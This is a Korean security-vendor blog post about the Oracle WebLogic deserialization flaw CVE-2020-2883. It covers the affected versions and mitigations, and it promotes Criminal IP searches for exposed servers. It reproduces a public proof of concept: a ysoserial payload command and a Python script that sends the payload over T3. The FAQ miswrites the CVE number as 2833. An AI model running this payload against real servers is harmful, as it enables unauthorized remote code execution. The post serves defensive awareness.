문의하기
블로그

오라클 웹로직 서버 취약점 CVE-2020-2883 : 5년간 지속된 서버 장악 위협

CVE-2020-2883 은 오라클 웹로직 서버(Oracle WebLogic Server)에서 원격 코드 실행(RCE)를 가능하게 하는 CVSS 점수 9.8의 치명적인 보안 취약점이다. 2020년 4월

2025. 01. 17.

CVE-2020-2883 은 오라클 웹로직 서버(Oracle WebLogic Server)에서 원격 코드 실행(RCE)를 가능하게 하는 CVSS 점수 9.8의 치명적인 보안 취약점이다. 2020년 4월 처음 보고되었으며, CISA의 악용 취약점(KEV) 목록에 2025년 1월 7일 추가되었다. 이는 해당 취약점이 발견된 지 5년이 지난 현재에도 여전히 다수의 IT 환경에서 패치되지 않은 상태로 사용되고 있음을 의미한다.

이번 글에서는 오라클 웹로직 취약점 CVE-2020-2883의 개념과 PoC를 통해 위험성을 알아보고, 실제로 이를 식별 및 방어하기 위한 위협 인텔리전스와 공격 표면 관리의 중요성을 소개한다.

CVE-2020-2883 : 오라클 웹로직 서버의 RCE 취약점

CVE-2020-2883은 IIOP(Internet Inter-ORB Protocol) 또는 T3(WebLogic의 독점 프로토콜)에서 발생하는 취약점으로, 직렬화 데이터 처리 과정에서 공격자가 악의적인 데이터를 주입하여 원격에서 코드를 실행할 수 있게 한다. 해당 취약점은 오라클 웹로직 서버의 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 및 12.2.1.4.0 버전에 영향을 미치며, 이 취약점이 악용될 경우, 서버가 완전히 장악되어 데이터 유출, 서비스 중단, 추가 네트워크 침투 등의 피해를 초래할 수 있다.

오라클 웹로직 서버 RCE 취약점 CVE-2020-2883의 대상 버전

  1. 10.3.6.0.0
  2. 12.1.3.0.0
  3. 12.2.1.3.0
  4. 12.2.1.4.0
CISA 의 KEV 목록에 추가된 오라클 웹로직 서버 취약점 CVE-2020-2883. 출처: CISA
CISA 의 KEV 목록에 추가된 오라클 웹로직 서버 취약점 CVE-2020-2883. 출처: CISA

공개된 PoC를 통한 공격 경로 분석

공개된 PoC를 통한 방어 지점 식별 및 보안 강화

공격 PoC는 공격자의 관점에서 IT 장비의 어느 지점을 타겟으로 삼고 있는지 알 수 있는 유용한 정보이다. 이는 보안 강화를 위한 핵심적인 정보가 될 수 있으며, 공격 표면 기반 위협 인텔리전스 검색엔진 Criminal IP에서는 PoC가 존재하는 CVE가 탐지된 IT 자산의 경우, IP 주소 리포트에서 해당 PoC도 함께 보여주기 때문에 Criminal IP를 통해 CVE의 존재 유무와 PoC를 한 번에 확인하는 것이 가능하다.

다음 이미지와 같이 CVE-2020-2883의 PoC도 제공하고 있다.

CVE-2020-2883이 탐지된 IP 주소 리포트에 PoC 링크를 함께 제공하는 Criminal IP
CVE-2020-2883이 탐지된 IP 주소 리포트에 PoC 링크를 함께 제공하는 Criminal IP

RCE 취약점 CVE-2020-2883의 공격 PoC 실행 단계

GitHub에 공개된 CVE-2020-2883의 PoC 실행 단계는 다음과 같다.

1. 취약한 웹로직 서버(버전 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 및 12.2.1.4.0)와 Python 또는 Java 실행 환경을 준비한다.

2. ysoserial 도구를 사용하여 악성 직렬화 데이터(payload.ser)를 생성한다. (‘명령어’ 는 실행하고자 하는 시스템 명령이다.)

java -jar ysoserial.jar CommonsCollections5 “명령어” > payload.ser

3.  T3 프로토콜을 사용하여 생성된 payload.ser를 웹로직 서버로 전송한다.

import socket

host = “취약한 WebLogic 서버 IP”
port = 7001  # 기본 T3 포트

with open(“payload.ser”, “rb”) as f:
    payload = f.read()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(b”\x00\x00\x00\x01″ + payload)  # T3 헤더 추가
s.close()

CVE-2020-2883는 위 PoC 과정을 통해 악용될 수 있으며, 보안 관리자 및 책임자는 T3 프로토콜 보안 강화와 방화벽 설정의 중요성을 확인할 수 있다.

공격 표면 기반 Criminal IP를 활용한 취약한 오라클 웹로직 서버 탐색

cve_id 및 title 필터를 사용한 취약한 오라클 웹로직 서버 탐색

CVE-2020-2883의 공격 지점과 위험성을 확인해 보았으니 이제 아직까지 패치가 적용되지 않은 채 외부에 공개된 오라클 웹로직 서버를 확인해 보려한다. CVE-2020-2883와 같은 취약점을 보유한 IT 자산을 탐지하려면 Criminal IP와 같은 위협 인텔리전스 플랫폼을 활용할 수 있다. 이번에는 Criminal IP의 Asset Search에서 cve_id, title, NOT 필터의 조합을 활용할 예정이다. 먼저 “cve_id: CVE-2020-2883” 검색 쿼리로 CVE-2020-2883 를 보유한 IP 주소를 찾고, 이후 검색 결과에서 404 페이지를 제외하기 위해 “NOT title: “Error 404–Not Found” 를 쿼리에 추가한다.

Criminal IP Search Query: cve_id: CVE-2020-2883 NOT title: “Error 404–Not Found”

Criminal IP의 cve_id: CVE-2020-2883 NOT title: "Error 404--Not Found" 검색 결과, 총 300개 이상의 오라클 웹로직 서버에서 CVE-2020-2883이 탐지되었다
Criminal IP의 cve_id: CVE-2020-2883 NOT title: “Error 404–Not Found” 검색 결과, 총 300개 이상의 오라클 웹로직 서버에서 CVE-2020-2883이 탐지되었다

검색 결과, CVE-2020-2883를 보유한 웹로직 서버는 총 396개이며, 이 중 하나의 IP 주소 리포트를 확인해보니 오라클 소유의 IP 주소임을 확인할 수 있었다. 해당 IP 주소는 CVE-2020-2883을 포함해 총167개의 취약점을 보유하고 있었으며, CVE-2020-2883에 영향을 받는 12.2.1.40 버전을 사용중인 점도 확인할 수 있었다.

Criminal IP의 IP 주소 리포트에서 확인한 취약한 오라클 웹로직 서버 버전 정보
Criminal IP의 IP 주소 리포트에서 확인한 취약한 오라클 웹로직 서버 버전 정보

검색 결과와 같이 여전히 패치가 적용되지 않은 오라클 웹로직 서버들이 외부에 다수 노출되어 있으며, 사용중인 서버가 CVE에 취약한 버전인지를 확인하기 위해서는 위협 헌팅 툴 Criminal IP 또는 공격 표면 관리 솔루션 Criminal IP ASM과 같은 보안 도구를 사용할 필요가 있다.

FAQ – 자주 묻는 질문

웹로직 서버 RCE 취약점 CVE-2020-2833의 문제점은 무엇인가?

발견된 지 5년이 지난 지금도 CVE-2020-2833은 심각한 보안 위협으로 작용하고 있다. 주요 문제점은 다음과 같다.

  1. 원격 코드 실행: 공격자가 인증 없이 악의적인 코드를 실행하여 데이터를 탈취하거나 악성 소프트웨어를 설치하거나, 서버를 다운시키는 등 시스템 권한을 장악할 수 있다.
  2. 비즈니스 서비스 중단: 웹로직 서버는 주로 대규모 기업 애플리케이션을 호스팅하기 때문에 RCE 공격으로 인해 서비스가 중단되거나 기업의 운영 및 신뢰도에 심각한 영향을 줄 수 있다.
  3. 데이터 유출 및 손실:  웹로직 서버에 저장된 민감한 데이터(고객 정보, 지적 재산 등)가 유출될 가능성이 높아지며, 이는 기업의 법적 문제와 경제적 손실로 이어질 수 있다.
  4. 추가 공격 기반 제공: 웹로직 서버는 주로 다른 시스템 및 데이터베이스와 통합되어 있으므로 랜섬웨어 설치, 네트워크 이동, 권한 상승 공격 등 내부 네트워크로의 추가 공격이 가능해진다.
  5. 악용의 쉬운 자동화: PoC 코드가 공개되면 공격자가 자동화된 스크립트를 이용하여 대규모 공격을 수행하기 쉬워지며, 인터넷에 노출된 WebLogic 서버를 대상으로 한 무차별 공격이 활발해질 수 있다.
  6. 미흡한 보안 관리 노출: 웹로직 서버의 취약한 보안 설정을 악용하기 때문에 보안 관리가 미흡하다는 것을 외부에 노출시켜, 기업 평판에 악영향을 미칠 수 있다.

CVE-2020-2833와 같은 RCE 취약점에 대응하기 위한 보안 관리자의 체크리스트에는 무엇이 있는가?

RCE 공격에 대응하기 위해서는 자동화된 공격 표면 관리에 기반한 정기적 자산 스캔 및 취약점 관리가 필요하다. 공격 표면 관리를 활용해 취약한 공격 표면과 취약점의 존재 여부를 확인한 후에는 다음과 같은 조치를 취해야 한다.

  1. 최신 보안 패치 적용: 오라클 등 제조사에서 제공한 보안 패치를 신속히 적용한다.
  2. T3 및 IIOP 프로토콜 비활성화: 불필요한 T3 및 IIOP 프로토콜을 비활성화한다.
  3. 방화벽 접근 제한: 방화벽에서 웹로직 서버의 관리 포트와 T3 포트를 차단한다.
  4. 입력 검증 강화: 신뢰할 수 없는 입력 데이터를 철저히 검증한다.

RCE 취약점: 신속한 패치 적용과 공격 표면 관리가 필수

CVE-2020-2883은 발견되고, 패치가 공개된지 5년이 지난 취약점이지만 여전히 다수의 오라클 웹로직 서버가 해당 취약점을 보유한 채 외부 네트워크에 노출되어 있다. 공격자들은 보안 관리가 미흡한 하나의 지점을 통해 네트워크 내 침투와 공격을 감행하기 때문에 사용하고 있지 않거나 방치되고 있는 IT 자산에 대한 리스크 관리도 보안에 있어 중요한 영역이다. 따라서 Criminal IP ASM과 같은 자동화된 공격 표면 관리 솔루션을 활용하여 자산 상태를 모니터링하고, 리스크 관리 체계를 구축해야 한다.

관련하여 오라클 웹로직 서버 원격코드 취약점 : CVE-2023-21839 글을 참고할 수 있다.

이 리포트는 사이버위협인텔리전스 검색엔진 Criminal IP의 데이터를 바탕으로 작성되었습니다. 지금 바로 Criminal IP 무료 계정을 생성하면 리포트에 인용된 검색 결과를 직접 확인하거나, 더 방대한 위협 인텔리전스를 자유롭게 검색할 수 있습니다. 

데이터 출처: Criminal IP(https://www.criminalip.io/ko)

관련 글 :

오라클 웹로직 서버 원격코드 취약점 : CVE-2023-21839